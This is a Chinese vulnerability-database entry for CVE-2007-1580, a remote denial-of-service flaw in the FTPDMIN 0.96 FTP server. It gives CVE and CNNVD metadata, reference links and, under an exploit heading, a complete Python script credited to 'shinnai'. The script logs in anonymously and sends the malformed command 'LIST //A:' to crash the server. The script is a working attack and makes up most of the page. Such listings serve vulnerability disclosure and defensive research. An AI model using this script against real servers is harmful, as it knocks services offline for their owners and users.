FTPDMIN Windows 驱动器号列表指令 远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112495 漏洞类型 缓冲区溢出
发布时间 2007-03-20 更新时间 2007-04-09
CVE编号 CVE-2007-1580 CNNVD-ID CNNVD-200703-508
漏洞平台 Windows CVSS评分 6.3
|漏洞来源
https://www.exploit-db.com/exploits/10100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-508
|漏洞详情
FTPDMIN0.96版本允许远程攻击者借助对驱动器号列表指令,引起拒绝服务攻击(后台程序崩溃)。
|漏洞EXP
# usr/bin/python

import socket
import time

print
"-----------------------------------------------------------------------"
print "# FTPDMIN v. 0.96 LIST Denial of Service"
print "# url: http://www.sentex.net/~mwandel/ftpdmin/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://shinnai.altervista.org"
print
"-----------------------------------------------------------------------\n"

buff = "//A:"

user = "anonymous"
password = "shinnai"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
   conn = s.connect(("127.0.0.1",21))
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('USER %s\r\n' % user)
   print "Client -> USER " + user
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('PASS %s\r\n' % password)
   print "Client -> PASS " + password
   d = s.recv(1024)
   print "Server <- " + d
   time.sleep(2)

   s.send('LIST %s\r\n' % buff)
   print "Client -> LIST " + buff
   d = s.recv(1024)
   print d
   time.sleep(2)

except:
   print "- Unable to connect. exiting."

# milw0rm.com [2007-03-20]
|参考资料

来源:XF
名称:ftpdmin-list-dos(33091)
链接:http://xforce.iss.net/xforce/xfdb/33091
来源:BID
名称:23049
链接:http://www.securityfocus.com/bid/23049
来源:MILW0RM
名称:3523
链接:http://www.milw0rm.com/exploits/3523
来源:OSVDB
名称:34524
链接:http://osvdb.org/34524